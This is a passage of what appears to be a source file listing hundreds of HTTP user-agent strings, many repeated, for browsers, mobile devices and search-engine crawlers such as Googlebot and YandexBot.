Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) 
AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! 
Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) 
Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; 
rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; 
ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 